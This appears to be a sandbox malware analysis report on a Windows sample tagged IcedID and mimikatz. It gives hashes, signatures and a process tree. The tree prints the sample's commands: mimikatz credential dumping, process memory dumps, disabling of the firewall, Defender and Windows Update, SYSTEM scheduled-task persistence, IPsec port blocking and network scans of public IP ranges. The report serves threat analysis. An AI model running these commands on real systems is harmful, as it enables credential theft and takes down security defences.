Analysis

  • max time kernel
    150s
  • max time network
    150s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20241007-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system
  • submitted
    14-10-2024 07:15

General

  • Target

    2024-10-14_9de4ed9557cac0a1246ea8b5a2d8eaae_hacktools_icedid_mimikatz.exe

  • Size

    9.1MB

  • MD5

    9de4ed9557cac0a1246ea8b5a2d8eaae

  • SHA1

    847b0e760723b44be2614193035bb45292b06130

  • SHA256

    31134dc7f27e39eacbe31d538169f54568ce4c31e5462f91c83be9a03e55cfb3

  • SHA512

    7aa8dfc1775001c4949cac7b7842ac5ebb460654977649cfa04b932cdb7bc06ea2837f050a1ec0b456305cc5f37a6f481cb2db057b1c3cb78a73478ba37d2109

  • SSDEEP

    196608:ylTPemknGzwHdOgEPHd9BYX/nivPlTXTYP:a3jz0E52/iv1

Malware Config

Signatures

  • Disables service(s) 3 TTPs
  • Mimikatz

    mimikatz is an open source tool to dump credentials on Windows.

  • Suspicious use of NtCreateUserProcessOtherParentProcess 1 IoCs
  • xmrig

    XMRig is a high performance, open source, cross platform CPU/GPU miner.

  • Contacts a large (18086) amount of remote hosts 1 TTPs

    This may indicate a network scan to discover remotely running services.

  • Creates a large amount of network flows 1 TTPs

    This may indicate a network scan to discover remotely running services.

  • OS Credential Dumping: LSASS Memory 1 TTPs

    Malicious access to Credentials History.

  • XMRig Miner payload 10 IoCs
  • mimikatz is an open source tool to dump credentials on Windows 5 IoCs
  • Drops file in Drivers directory 2 IoCs
  • Event Triggered Execution: Image File Execution Options Injection 1 TTPs 40 IoCs
  • Modifies Windows Firewall 2 TTPs 2 IoCs
  • Executes dropped EXE 27 IoCs
  • Loads dropped DLL 12 IoCs
  • Checks installed software on the system 1 TTPs

    Looks up Uninstall key entries in the registry to enumerate software on the system.

  • Looks up external IP address via web service 2 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • Network Share Discovery 1 TTPs

    Attempt to gather information on host network.

  • Creates a Windows Service
  • Drops file in System32 directory 18 IoCs
  • UPX packed file 33 IoCs

    Detects executables packed with UPX/modified UPX open source packer.

  • Drops file in Program Files directory 3 IoCs
  • Drops file in Windows directory 60 IoCs
  • Launches sc.exe 4 IoCs

    Sc.exe is a Windows utlilty to control services on the system.

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Event Triggered Execution: Netsh Helper DLL 1 TTPs 51 IoCs

    Netsh.exe (also referred to as Netshell) is a command-line scripting utility used to interact with the network configuration of a system.

  • System Location Discovery: System Language Discovery 1 TTPs 64 IoCs

    Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

  • System Network Configuration Discovery: Internet Connection Discovery 1 TTPs 2 IoCs

    Adversaries may check for Internet connectivity on compromised systems.

  • NSIS installer 3 IoCs
  • Modifies data under HKEY_USERS 41 IoCs
  • Modifies registry class 14 IoCs
  • Runs net.exe
  • Runs ping.exe 1 TTPs 1 IoCs
  • Scheduled Task/Job: Scheduled Task 1 TTPs 3 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious behavior: LoadsDriver 15 IoCs
  • Suspicious behavior: RenamesItself 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 22 IoCs
  • Suspicious use of SetWindowsHookEx 12 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs

Processes

  • C:\Windows\System32\spoolsv.exe
    C:\Windows\System32\spoolsv.exe
    1⤵
      PID:1732
      • C:\Windows\TEMP\lntjubmbe\ttlnnh.exe
        "C:\Windows\TEMP\lntjubmbe\ttlnnh.exe"
        2⤵
        • Executes dropped EXE
        • Suspicious use of AdjustPrivilegeToken
        PID:5004
    • C:\Users\Admin\AppData\Local\Temp\2024-10-14_9de4ed9557cac0a1246ea8b5a2d8eaae_hacktools_icedid_mimikatz.exe
      "C:\Users\Admin\AppData\Local\Temp\2024-10-14_9de4ed9557cac0a1246ea8b5a2d8eaae_hacktools_icedid_mimikatz.exe"
      1⤵
      • Drops file in Windows directory
      • System Location Discovery: System Language Discovery
      • Suspicious behavior: RenamesItself
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of SetWindowsHookEx
      • Suspicious use of WriteProcessMemory
      PID:4996
      • C:\Windows\SysWOW64\cmd.exe
        cmd /c ping 127.0.0.1 -n 5 & Start C:\Windows\tllefmnq\yittybr.exe
        2⤵
        • System Location Discovery: System Language Discovery
        • System Network Configuration Discovery: Internet Connection Discovery
        • Suspicious use of WriteProcessMemory
        PID:3532
        • C:\Windows\SysWOW64\PING.EXE
          ping 127.0.0.1 -n 5
          3⤵
          • System Location Discovery: System Language Discovery
          • System Network Configuration Discovery: Internet Connection Discovery
          • Runs ping.exe
          PID:2960
        • C:\Windows\tllefmnq\yittybr.exe
          C:\Windows\tllefmnq\yittybr.exe
          3⤵
          • Executes dropped EXE
          • Suspicious use of AdjustPrivilegeToken
          • Suspicious use of SetWindowsHookEx
          PID:4964
    • C:\Windows\tllefmnq\yittybr.exe
      C:\Windows\tllefmnq\yittybr.exe
      1⤵
      • Suspicious use of NtCreateUserProcessOtherParentProcess
      • Drops file in Drivers directory
      • Event Triggered Execution: Image File Execution Options Injection
      • Executes dropped EXE
      • Drops file in System32 directory
      • Drops file in Windows directory
      • Modifies data under HKEY_USERS
      • Modifies registry class
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of SetWindowsHookEx
      • Suspicious use of WriteProcessMemory
      PID:3916
      • C:\Windows\SysWOW64\cmd.exe
        cmd /c echo Y|cacls C:\Windows\system32\drivers\etc\hosts /T /D users & echo Y|cacls C:\Windows\system32\drivers\etc\hosts /T /D administrators & echo Y|cacls C:\Windows\system32\drivers\etc\hosts /T /D SYSTEM
        2⤵
        • System Location Discovery: System Language Discovery
        • Suspicious use of WriteProcessMemory
        PID:1712
        • C:\Windows\SysWOW64\cmd.exe
          C:\Windows\system32\cmd.exe /S /D /c" echo Y"
          3⤵
          • System Location Discovery: System Language Discovery
          PID:2108
        • C:\Windows\SysWOW64\cacls.exe
          cacls C:\Windows\system32\drivers\etc\hosts /T /D users
          3⤵
          • System Location Discovery: System Language Discovery
          PID:2244
        • C:\Windows\SysWOW64\cmd.exe
          C:\Windows\system32\cmd.exe /S /D /c" echo Y"
          3⤵
          • System Location Discovery: System Language Discovery
          PID:940
        • C:\Windows\SysWOW64\cacls.exe
          cacls C:\Windows\system32\drivers\etc\hosts /T /D administrators
          3⤵
          • System Location Discovery: System Language Discovery
          PID:3052
        • C:\Windows\SysWOW64\cmd.exe
          C:\Windows\system32\cmd.exe /S /D /c" echo Y"
          3⤵
          • System Location Discovery: System Language Discovery
          PID:3204
        • C:\Windows\SysWOW64\cacls.exe
          cacls C:\Windows\system32\drivers\etc\hosts /T /D SYSTEM
          3⤵
            PID:1432
        • C:\Windows\SysWOW64\netsh.exe
          netsh ipsec static del all
          2⤵
          • Event Triggered Execution: Netsh Helper DLL
          PID:2772
        • C:\Windows\SysWOW64\netsh.exe
          netsh ipsec static add policy name=Bastards description=FuckingBastards
          2⤵
          • Event Triggered Execution: Netsh Helper DLL
          • System Location Discovery: System Language Discovery
          PID:3156
        • C:\Windows\SysWOW64\netsh.exe
          netsh ipsec static add filteraction name=BastardsList action=block
          2⤵
          • Event Triggered Execution: Netsh Helper DLL
          • System Location Discovery: System Language Discovery
          PID:1436
        • C:\Windows\SysWOW64\cmd.exe
          cmd /c C:\Windows\ppgkyibiq\ihnqsqiep\wpcap.exe /S
          2⤵
          • System Location Discovery: System Language Discovery
          • Suspicious use of WriteProcessMemory
          PID:2556
          • C:\Windows\ppgkyibiq\ihnqsqiep\wpcap.exe
            C:\Windows\ppgkyibiq\ihnqsqiep\wpcap.exe /S
            3⤵
            • Drops file in Drivers directory
            • Executes dropped EXE
            • Loads dropped DLL
            • Drops file in System32 directory
            • Drops file in Program Files directory
            • System Location Discovery: System Language Discovery
            • Suspicious use of WriteProcessMemory
            PID:4924
            • C:\Windows\SysWOW64\net.exe
              net stop "Boundary Meter"
              4⤵
              • System Location Discovery: System Language Discovery
              • Suspicious use of WriteProcessMemory
              PID:2980
              • C:\Windows\SysWOW64\net1.exe
                C:\Windows\system32\net1 stop "Boundary Meter"
                5⤵
                • System Location Discovery: System Language Discovery
                PID:4540
            • C:\Windows\SysWOW64\net.exe
              net stop "TrueSight Meter"
              4⤵
              • System Location Discovery: System Language Discovery
              • Suspicious use of WriteProcessMemory
              PID:5040
              • C:\Windows\SysWOW64\net1.exe
                C:\Windows\system32\net1 stop "TrueSight Meter"
                5⤵
                • System Location Discovery: System Language Discovery
                PID:1476
            • C:\Windows\SysWOW64\net.exe
              net stop npf
              4⤵
              • Suspicious use of WriteProcessMemory
              PID:400
              • C:\Windows\SysWOW64\net1.exe
                C:\Windows\system32\net1 stop npf
                5⤵
                • System Location Discovery: System Language Discovery
                PID:4432
            • C:\Windows\SysWOW64\net.exe
              net start npf
              4⤵
              • System Location Discovery: System Language Discovery
              PID:4368
              • C:\Windows\SysWOW64\net1.exe
                C:\Windows\system32\net1 start npf
                5⤵
                • System Location Discovery: System Language Discovery
                PID:2856
        • C:\Windows\SysWOW64\cmd.exe
          cmd /c net start npf
          2⤵
            PID:5024
            • C:\Windows\SysWOW64\net.exe
              net start npf
              3⤵
              • System Location Discovery: System Language Discovery
              PID:4776
              • C:\Windows\SysWOW64\net1.exe
                C:\Windows\system32\net1 start npf
                4⤵
                • System Location Discovery: System Language Discovery
                PID:1224
          • C:\Windows\SysWOW64\cmd.exe
            cmd /c net start npf
            2⤵
            • System Location Discovery: System Language Discovery
            PID:3044
            • C:\Windows\SysWOW64\net.exe
              net start npf
              3⤵
              • System Location Discovery: System Language Discovery
              PID:4228
              • C:\Windows\SysWOW64\net1.exe
                C:\Windows\system32\net1 start npf
                4⤵
                • System Location Discovery: System Language Discovery
                PID:4856
          • C:\Windows\SysWOW64\cmd.exe
            cmd /c C:\Windows\ppgkyibiq\ihnqsqiep\bjfisnrbq.exe -p 80 222.186.128.1-222.186.255.255 --rate=1024 -oJ C:\Windows\ppgkyibiq\ihnqsqiep\Scant.txt
            2⤵
            • System Location Discovery: System Language Discovery
            PID:2284
            • C:\Windows\ppgkyibiq\ihnqsqiep\bjfisnrbq.exe
              C:\Windows\ppgkyibiq\ihnqsqiep\bjfisnrbq.exe -p 80 222.186.128.1-222.186.255.255 --rate=1024 -oJ C:\Windows\ppgkyibiq\ihnqsqiep\Scant.txt
              3⤵
              • Executes dropped EXE
              • Loads dropped DLL
              PID:1748
          • C:\Windows\SysWOW64\cmd.exe
            cmd /c C:\Windows\ppgkyibiq\Corporate\vfshost.exe privilege::debug sekurlsa::logonpasswords exit >> C:\Windows\ppgkyibiq\Corporate\log.txt
            2⤵
            • Drops file in Windows directory
            PID:3180
            • C:\Windows\ppgkyibiq\Corporate\vfshost.exe
              C:\Windows\ppgkyibiq\Corporate\vfshost.exe privilege::debug sekurlsa::logonpasswords exit
              3⤵
              • Executes dropped EXE
              • Suspicious use of AdjustPrivilegeToken
              PID:5004
          • C:\Windows\SysWOW64\cmd.exe
            cmd /c echo Y|schtasks /create /sc minute /mo 1 /tn "yllebvbbl" /ru system /tr "cmd /c C:\Windows\ime\yittybr.exe"
            2⤵
            • System Location Discovery: System Language Discovery
            PID:3056
            • C:\Windows\SysWOW64\cmd.exe
              C:\Windows\system32\cmd.exe /S /D /c" echo Y"
              3⤵
                PID:4568
              • C:\Windows\SysWOW64\schtasks.exe
                schtasks /create /sc minute /mo 1 /tn "yllebvbbl" /ru system /tr "cmd /c C:\Windows\ime\yittybr.exe"
                3⤵
                • Scheduled Task/Job: Scheduled Task
                PID:1636
            • C:\Windows\SysWOW64\cmd.exe
              cmd /c echo Y|schtasks /create /sc minute /mo 1 /tn "fmptikrhb" /ru system /tr "cmd /c echo Y|cacls C:\Windows\tllefmnq\yittybr.exe /p everyone:F"
              2⤵
                PID:848
                • C:\Windows\SysWOW64\cmd.exe
                  C:\Windows\system32\cmd.exe /S /D /c" echo Y"
                  3⤵
                  • System Location Discovery: System Language Discovery
                  PID:2996
                • C:\Windows\SysWOW64\schtasks.exe
                  schtasks /create /sc minute /mo 1 /tn "fmptikrhb" /ru system /tr "cmd /c echo Y|cacls C:\Windows\tllefmnq\yittybr.exe /p everyone:F"
                  3⤵
                  • System Location Discovery: System Language Discovery
                  • Scheduled Task/Job: Scheduled Task
                  PID:3980
              • C:\Windows\SysWOW64\cmd.exe
                cmd /c echo Y|schtasks /create /sc minute /mo 1 /tn "blhbujgqb" /ru system /tr "cmd /c echo Y|cacls C:\Windows\TEMP\lntjubmbe\ttlnnh.exe /p everyone:F"
                2⤵
                • System Location Discovery: System Language Discovery
                PID:2904
                • C:\Windows\SysWOW64\cmd.exe
                  C:\Windows\system32\cmd.exe /S /D /c" echo Y"
                  3⤵
                  • System Location Discovery: System Language Discovery
                  PID:4468
                • C:\Windows\SysWOW64\schtasks.exe
                  schtasks /create /sc minute /mo 1 /tn "blhbujgqb" /ru system /tr "cmd /c echo Y|cacls C:\Windows\TEMP\lntjubmbe\ttlnnh.exe /p everyone:F"
                  3⤵
                  • System Location Discovery: System Language Discovery
                  • Scheduled Task/Job: Scheduled Task
                  PID:64
              • C:\Windows\SysWOW64\netsh.exe
                netsh ipsec static add filter filterlist=BastardsList srcaddr=any dstaddr=Me dstport=139 protocol=TCP
                2⤵
                • Event Triggered Execution: Netsh Helper DLL
                • System Location Discovery: System Language Discovery
                PID:4636
              • C:\Windows\SysWOW64\netsh.exe
                netsh ipsec static add filter filterlist=BastardsList srcaddr=any dstaddr=Me dstport=139 protocol=UDP
                2⤵
                • Event Triggered Execution: Netsh Helper DLL
                • System Location Discovery: System Language Discovery
                PID:1624
              • C:\Windows\SysWOW64\netsh.exe
                netsh ipsec static add rule name=Rule1 policy=Bastards filterlist=BastardsList filteraction=BastardsList
                2⤵
                • Event Triggered Execution: Netsh Helper DLL
                • System Location Discovery: System Language Discovery
                PID:2580
              • C:\Windows\SysWOW64\netsh.exe
                netsh ipsec static set policy name=Bastards assign=y
                2⤵
                • Event Triggered Execution: Netsh Helper DLL
                • System Location Discovery: System Language Discovery
                PID:260
              • C:\Windows\SysWOW64\netsh.exe
                netsh ipsec static add filter filterlist=BastardsList srcaddr=any dstaddr=Me dstport=135 protocol=TCP
                2⤵
                • Event Triggered Execution: Netsh Helper DLL
                • System Location Discovery: System Language Discovery
                PID:4404
              • C:\Windows\SysWOW64\netsh.exe
                netsh ipsec static add filter filterlist=BastardsList srcaddr=any dstaddr=Me dstport=135 protocol=UDP
                2⤵
                • Event Triggered Execution: Netsh Helper DLL
                • System Location Discovery: System Language Discovery
                PID:4840
              • C:\Windows\SysWOW64\netsh.exe
                netsh ipsec static add rule name=Rule1 policy=Bastards filterlist=BastardsList filteraction=BastardsList
                2⤵
                • Event Triggered Execution: Netsh Helper DLL
                • System Location Discovery: System Language Discovery
                PID:428
              • C:\Windows\SysWOW64\netsh.exe
                netsh ipsec static set policy name=Bastards assign=y
                2⤵
                • Event Triggered Execution: Netsh Helper DLL
                PID:1816
              • C:\Windows\SysWOW64\netsh.exe
                netsh ipsec static add filter filterlist=BastardsList srcaddr=any dstaddr=Me dstport=445 protocol=TCP
                2⤵
                • Event Triggered Execution: Netsh Helper DLL
                PID:3400
              • C:\Windows\SysWOW64\netsh.exe
                netsh ipsec static add filter filterlist=BastardsList srcaddr=any dstaddr=Me dstport=445 protocol=UDP
                2⤵
                • Event Triggered Execution: Netsh Helper DLL
                • System Location Discovery: System Language Discovery
                PID:4560
              • C:\Windows\SysWOW64\netsh.exe
                netsh ipsec static add rule name=Rule1 policy=Bastards filterlist=BastardsList filteraction=BastardsList
                2⤵
                • Event Triggered Execution: Netsh Helper DLL
                • System Location Discovery: System Language Discovery
                PID:3860
              • C:\Windows\SysWOW64\netsh.exe
                netsh ipsec static set policy name=Bastards assign=y
                2⤵
                • Event Triggered Execution: Netsh Helper DLL
                • System Location Discovery: System Language Discovery
                PID:1620
              • C:\Windows\SysWOW64\cmd.exe
                cmd /c net stop SharedAccess
                2⤵
                • System Location Discovery: System Language Discovery
                PID:4448
                • C:\Windows\SysWOW64\net.exe
                  net stop SharedAccess
                  3⤵
                  • System Location Discovery: System Language Discovery
                  PID:2704
                  • C:\Windows\SysWOW64\net1.exe
                    C:\Windows\system32\net1 stop SharedAccess
                    4⤵
                    • System Location Discovery: System Language Discovery
                    PID:4160
              • C:\Windows\SysWOW64\cmd.exe
                cmd /c netsh firewall set opmode mode=disable
                2⤵
                • System Location Discovery: System Language Discovery
                PID:4996
                • C:\Windows\SysWOW64\netsh.exe
                  netsh firewall set opmode mode=disable
                  3⤵
                  • Modifies Windows Firewall
                  • Event Triggered Execution: Netsh Helper DLL
                  PID:1132
              • C:\Windows\SysWOW64\cmd.exe
                cmd /c netsh Advfirewall set allprofiles state off
                2⤵
                  PID:1832
                  • C:\Windows\SysWOW64\netsh.exe
                    netsh Advfirewall set allprofiles state off
                    3⤵
                    • Modifies Windows Firewall
                    • Event Triggered Execution: Netsh Helper DLL
                    PID:4100
                • C:\Windows\SysWOW64\cmd.exe
                  cmd /c net stop MpsSvc
                  2⤵
                    PID:1036
                    • C:\Windows\SysWOW64\net.exe
                      net stop MpsSvc
                      3⤵
                      • System Location Discovery: System Language Discovery
                      PID:4912
                      • C:\Windows\SysWOW64\net1.exe
                        C:\Windows\system32\net1 stop MpsSvc
                        4⤵
                        • System Location Discovery: System Language Discovery
                        PID:924
                  • C:\Windows\SysWOW64\cmd.exe
                    cmd /c net stop WinDefend
                    2⤵
                    • System Location Discovery: System Language Discovery
                    PID:4412
                    • C:\Windows\SysWOW64\net.exe
                      net stop WinDefend
                      3⤵
                        PID:4468
                        • C:\Windows\SysWOW64\net1.exe
                          C:\Windows\system32\net1 stop WinDefend
                          4⤵
                          • System Location Discovery: System Language Discovery
                          PID:4264
                    • C:\Windows\SysWOW64\cmd.exe
                      cmd /c net stop wuauserv
                      2⤵
                      • System Location Discovery: System Language Discovery
                      PID:3340
                      • C:\Windows\SysWOW64\net.exe
                        net stop wuauserv
                        3⤵
                        • System Location Discovery: System Language Discovery
                        PID:2324
                        • C:\Windows\SysWOW64\net1.exe
                          C:\Windows\system32\net1 stop wuauserv
                          4⤵
                          • System Location Discovery: System Language Discovery
                          PID:4656
                    • C:\Windows\SysWOW64\cmd.exe
                      cmd /c sc config MpsSvc start= disabled
                      2⤵
                      • System Location Discovery: System Language Discovery
                      PID:2220
                      • C:\Windows\SysWOW64\sc.exe
                        sc config MpsSvc start= disabled
                        3⤵
                        • Launches sc.exe
                        • System Location Discovery: System Language Discovery
                        PID:3136
                    • C:\Windows\SysWOW64\cmd.exe
                      cmd /c sc config SharedAccess start= disabled
                      2⤵
                      • System Location Discovery: System Language Discovery
                      PID:2192
                      • C:\Windows\SysWOW64\sc.exe
                        sc config SharedAccess start= disabled
                        3⤵
                        • Launches sc.exe
                        • System Location Discovery: System Language Discovery
                        PID:3780
                    • C:\Windows\SysWOW64\cmd.exe
                      cmd /c sc config WinDefend start= disabled
                      2⤵
                      • System Location Discovery: System Language Discovery
                      PID:2668
                      • C:\Windows\SysWOW64\sc.exe
                        sc config WinDefend start= disabled
                        3⤵
                        • Launches sc.exe
                        • System Location Discovery: System Language Discovery
                        PID:4636
                    • C:\Windows\SysWOW64\cmd.exe
                      cmd /c sc config wuauserv start= disabled
                      2⤵
                      • System Location Discovery: System Language Discovery
                      PID:3516
                      • C:\Windows\SysWOW64\sc.exe
                        sc config wuauserv start= disabled
                        3⤵
                        • Launches sc.exe
                        • System Location Discovery: System Language Discovery
                        PID:1984
                    • C:\Windows\TEMP\ppgkyibiq\btjlhtrlh.exe
                      C:\Windows\TEMP\ppgkyibiq\btjlhtrlh.exe -accepteula -mp 768 C:\Windows\TEMP\ppgkyibiq\768.dmp
                      2⤵
                      • Executes dropped EXE
                      • Modifies data under HKEY_USERS
                      • Suspicious use of AdjustPrivilegeToken
                      PID:732
                    • C:\Windows\TEMP\xohudmc.exe
                      C:\Windows\TEMP\xohudmc.exe
                      2⤵
                      • Executes dropped EXE
                      • Drops file in System32 directory
                      • System Location Discovery: System Language Discovery
                      • Suspicious use of SetWindowsHookEx
                      PID:3980
                    • C:\Windows\TEMP\ppgkyibiq\btjlhtrlh.exe
                      C:\Windows\TEMP\ppgkyibiq\btjlhtrlh.exe -accepteula -mp 1020 C:\Windows\TEMP\ppgkyibiq\1020.dmp
                      2⤵
                      • Executes dropped EXE
                      • Modifies data under HKEY_USERS
                      • Suspicious use of AdjustPrivilegeToken
                      PID:3228
                    • C:\Windows\TEMP\ppgkyibiq\btjlhtrlh.exe
                      C:\Windows\TEMP\ppgkyibiq\btjlhtrlh.exe -accepteula -mp 1732 C:\Windows\TEMP\ppgkyibiq\1732.dmp
                      2⤵
                      • Executes dropped EXE
                      • Modifies data under HKEY_USERS
                      • Suspicious use of AdjustPrivilegeToken
                      PID:260
                    • C:\Windows\TEMP\ppgkyibiq\btjlhtrlh.exe
                      C:\Windows\TEMP\ppgkyibiq\btjlhtrlh.exe -accepteula -mp 2504 C:\Windows\TEMP\ppgkyibiq\2504.dmp
                      2⤵
                      • Executes dropped EXE
                      • Modifies data under HKEY_USERS
                      • Suspicious use of AdjustPrivilegeToken
                      PID:3888
                    • C:\Windows\TEMP\ppgkyibiq\btjlhtrlh.exe
                      C:\Windows\TEMP\ppgkyibiq\btjlhtrlh.exe -accepteula -mp 2832 C:\Windows\TEMP\ppgkyibiq\2832.dmp
                      2⤵
                      • Executes dropped EXE
                      • Modifies data under HKEY_USERS
                      • Suspicious use of AdjustPrivilegeToken
                      PID:1096
                    • C:\Windows\TEMP\ppgkyibiq\btjlhtrlh.exe
                      C:\Windows\TEMP\ppgkyibiq\btjlhtrlh.exe -accepteula -mp 2156 C:\Windows\TEMP\ppgkyibiq\2156.dmp
                      2⤵
                      • Executes dropped EXE
                      • Modifies data under HKEY_USERS
                      • Suspicious use of AdjustPrivilegeToken
                      PID:3612
                    • C:\Windows\TEMP\ppgkyibiq\btjlhtrlh.exe
                      C:\Windows\TEMP\ppgkyibiq\btjlhtrlh.exe -accepteula -mp 3100 C:\Windows\TEMP\ppgkyibiq\3100.dmp
                      2⤵
                      • Executes dropped EXE
                      • Modifies data under HKEY_USERS
                      • Suspicious use of AdjustPrivilegeToken
                      PID:4924
                    • C:\Windows\TEMP\ppgkyibiq\btjlhtrlh.exe
                      C:\Windows\TEMP\ppgkyibiq\btjlhtrlh.exe -accepteula -mp 3808 C:\Windows\TEMP\ppgkyibiq\3808.dmp
                      2⤵
                      • Executes dropped EXE
                      • Modifies data under HKEY_USERS
                      • Suspicious use of AdjustPrivilegeToken
                      PID:3292
                    • C:\Windows\TEMP\ppgkyibiq\btjlhtrlh.exe
                      C:\Windows\TEMP\ppgkyibiq\btjlhtrlh.exe -accepteula -mp 3908 C:\Windows\TEMP\ppgkyibiq\3908.dmp
                      2⤵
                      • Executes dropped EXE
                      • Modifies data under HKEY_USERS
                      • Suspicious use of AdjustPrivilegeToken
                      PID:3008
                    • C:\Windows\TEMP\ppgkyibiq\btjlhtrlh.exe
                      C:\Windows\TEMP\ppgkyibiq\btjlhtrlh.exe -accepteula -mp 4004 C:\Windows\TEMP\ppgkyibiq\4004.dmp
                      2⤵
                      • Executes dropped EXE
                      • Modifies data under HKEY_USERS
                      • Suspicious use of AdjustPrivilegeToken
                      PID:4656
                    • C:\Windows\TEMP\ppgkyibiq\btjlhtrlh.exe
                      C:\Windows\TEMP\ppgkyibiq\btjlhtrlh.exe -accepteula -mp 3364 C:\Windows\TEMP\ppgkyibiq\3364.dmp
                      2⤵
                      • Executes dropped EXE
                      • Modifies data under HKEY_USERS
                      • Suspicious use of AdjustPrivilegeToken
                      PID:1436
                    • C:\Windows\TEMP\ppgkyibiq\btjlhtrlh.exe
                      C:\Windows\TEMP\ppgkyibiq\btjlhtrlh.exe -accepteula -mp 4460 C:\Windows\TEMP\ppgkyibiq\4460.dmp
                      2⤵
                      • Executes dropped EXE
                      • Modifies data under HKEY_USERS
                      • Suspicious use of AdjustPrivilegeToken
                      PID:4844
                    • C:\Windows\TEMP\ppgkyibiq\btjlhtrlh.exe
                      C:\Windows\TEMP\ppgkyibiq\btjlhtrlh.exe -accepteula -mp 372 C:\Windows\TEMP\ppgkyibiq\372.dmp
                      2⤵
                      • Executes dropped EXE
                      • Modifies data under HKEY_USERS
                      • Suspicious use of AdjustPrivilegeToken
                      PID:2420
                    • C:\Windows\TEMP\ppgkyibiq\btjlhtrlh.exe
                      C:\Windows\TEMP\ppgkyibiq\btjlhtrlh.exe -accepteula -mp 3192 C:\Windows\TEMP\ppgkyibiq\3192.dmp
                      2⤵
                      • Executes dropped EXE
                      • Modifies data under HKEY_USERS
                      • Suspicious use of AdjustPrivilegeToken
                      PID:1636
                    • C:\Windows\TEMP\ppgkyibiq\btjlhtrlh.exe
                      C:\Windows\TEMP\ppgkyibiq\btjlhtrlh.exe -accepteula -mp 3968 C:\Windows\TEMP\ppgkyibiq\3968.dmp
                      2⤵
                      • Executes dropped EXE
                      • Modifies data under HKEY_USERS
                      • Suspicious use of AdjustPrivilegeToken
                      PID:752
                    • C:\Windows\TEMP\ppgkyibiq\btjlhtrlh.exe
                      C:\Windows\TEMP\ppgkyibiq\btjlhtrlh.exe -accepteula -mp 2924 C:\Windows\TEMP\ppgkyibiq\2924.dmp
                      2⤵
                      • Executes dropped EXE
                      • Modifies data under HKEY_USERS
                      • Suspicious use of AdjustPrivilegeToken
                      PID:4424
                    • C:\Windows\SysWOW64\cmd.exe
                      cmd.exe /c C:\Windows\ppgkyibiq\ihnqsqiep\scan.bat
                      2⤵
                      • System Location Discovery: System Language Discovery
                      PID:1752
                      • C:\Windows\ppgkyibiq\ihnqsqiep\vmlbqggye.exe
                        vmlbqggye.exe TCP 138.199.0.1 138.199.255.255 7001 512 /save
                        3⤵
                        • Executes dropped EXE
                        • Drops file in Windows directory
                        PID:4700
                  • C:\Windows\SysWOW64\wooaom.exe
                    C:\Windows\SysWOW64\wooaom.exe
                    1⤵
                    • Executes dropped EXE
                    • System Location Discovery: System Language Discovery
                    • Suspicious use of SetWindowsHookEx
                    PID:4200
                  • C:\Windows\system32\cmd.EXE
                    C:\Windows\system32\cmd.EXE /c C:\Windows\ime\yittybr.exe
                    1⤵
                      PID:4436
                      • C:\Windows\ime\yittybr.exe
                        C:\Windows\ime\yittybr.exe
                        2⤵
                        • Executes dropped EXE
                        • Suspicious use of SetWindowsHookEx
                        PID:1880
                    • C:\Windows\system32\cmd.EXE
                      C:\Windows\system32\cmd.EXE /c echo Y|cacls C:\Windows\tllefmnq\yittybr.exe /p everyone:F
                      1⤵
                        PID:1392
                        • C:\Windows\system32\cmd.exe
                          C:\Windows\system32\cmd.exe /S /D /c" echo Y"
                          2⤵
                            PID:632
                          • C:\Windows\system32\cacls.exe
                            cacls C:\Windows\tllefmnq\yittybr.exe /p everyone:F
                            2⤵
                              PID:4024
                          • C:\Windows\system32\cmd.EXE
                            C:\Windows\system32\cmd.EXE /c echo Y|cacls C:\Windows\TEMP\lntjubmbe\ttlnnh.exe /p everyone:F
                            1⤵
                              PID:4720
                              • C:\Windows\system32\cmd.exe
                                C:\Windows\system32\cmd.exe /S /D /c" echo Y"
                                2⤵
                                  PID:5080
                                • C:\Windows\system32\cacls.exe
                                  cacls C:\Windows\TEMP\lntjubmbe\ttlnnh.exe /p everyone:F
                                  2⤵
                                    PID:1664
                                • C:\Windows\system32\cmd.EXE
                                  C:\Windows\system32\cmd.EXE /c echo Y|cacls C:\Windows\tllefmnq\yittybr.exe /p everyone:F
                                  1⤵
                                    PID:3376
                                    • C:\Windows\system32\cmd.exe
                                      C:\Windows\system32\cmd.exe /S /D /c" echo Y"
                                      2⤵
                                        PID:5472
                                      • C:\Windows\system32\cacls.exe
                                        cacls C:\Windows\tllefmnq\yittybr.exe /p everyone:F
                                        2⤵
                                          PID:5236
                                      • C:\Windows\system32\cmd.EXE
                                        C:\Windows\system32\cmd.EXE /c C:\Windows\ime\yittybr.exe
                                        1⤵
                                          PID:4728
                                          • C:\Windows\ime\yittybr.exe
                                            C:\Windows\ime\yittybr.exe
                                            2⤵
                                            • Executes dropped EXE
                                            • Suspicious use of SetWindowsHookEx
                                            PID:5512
                                        • C:\Windows\system32\cmd.EXE
                                          C:\Windows\system32\cmd.EXE /c echo Y|cacls C:\Windows\TEMP\lntjubmbe\ttlnnh.exe /p everyone:F
                                          1⤵
                                            PID:232
                                            • C:\Windows\system32\cmd.exe
                                              C:\Windows\system32\cmd.exe /S /D /c" echo Y"
                                              2⤵
                                                PID:5976
                                              • C:\Windows\system32\cacls.exe
                                                cacls C:\Windows\TEMP\lntjubmbe\ttlnnh.exe /p everyone:F
                                                2⤵
                                                  PID:1880

                                              Network

                                              MITRE ATT&CK Enterprise v15

                                              Replay Monitor

                                              Loading Replay Monitor...

                                              Downloads

                                              • C:\Windows\SysWOW64\Packet.dll

                                                Filesize

                                                95KB

                                                MD5

                                                86316be34481c1ed5b792169312673fd

                                                SHA1

                                                6ccde3a8c76879e49b34e4abb3b8dfaf7a9d77b5

                                                SHA256

                                                49656c178b17198470ad6906e9ee0865f16f01c1dbbf11c613b55a07246a7918

                                                SHA512

                                                3a6e77c39942b89f3f149e9527ab8a9eb39f55ac18a9db3a3922dfb294beb0760d10ca12be0e3a3854ff7dabbe2df18c52e3696874623a2a9c5dc74b29a860bc

                                              • C:\Windows\SysWOW64\wpcap.dll

                                                Filesize

                                                275KB

                                                MD5

